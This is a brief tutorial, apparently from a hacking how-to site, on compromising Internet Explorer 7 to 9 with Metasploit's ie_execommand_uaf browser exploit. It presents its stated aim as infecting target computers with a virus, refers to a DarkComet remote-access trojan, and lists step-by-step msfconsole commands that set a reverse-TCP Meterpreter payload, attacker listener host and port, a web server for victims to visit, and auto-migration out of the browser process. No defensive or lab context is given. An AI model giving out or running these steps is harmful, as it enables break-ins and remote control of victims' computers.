How to exploit IE

Internet explorer exploit

 

In this article we will share the process to exploit an Internet explorer 7, 8 or 9. This exploit will allow you to patch the target computers with virus.

What you need:

  • A server or virus to send to the target. Refer to the DarkComet tutorial for an example of how to make one.
  • Metasploit (comes with BackTrack. Setup instructions for setting this up can be found in this app.)

Steps to exploit:

  1. Start up msfconsole, and enter the following commands:  use exploit/windows/browser/ie_execommand_uaf
  2. set PAYLOAD windows/meterpreter/reverse_tcp (can be arbitrary, type show payloads to see what you want)
  3. The next 2 commands are only required for reverse payloads, and may be skipped.
  4. set LHOST 0.0.0.0 (Your IP address)
  5. set LPORT 443 (can be arbitrary)
  6. set SRVHOST 0.0.0.0 (can be arbitrary IP to host server, if you have bind access. Otherwise use yourself.)
  7. set SRVPORT 80 (for direct HTTP, can be changed)
  8. set URIPATH / (can be arbitrary, is basically the path after your ip [e.g 0.0.0.0/mypath can be just / if they connect directly])
  9. set AutoRunScript migrate -f (use for meterpreter to move from browser process which can be closed)
  10. exploit (runs your server)

Follow these steps carefully and you can easily exploit IE.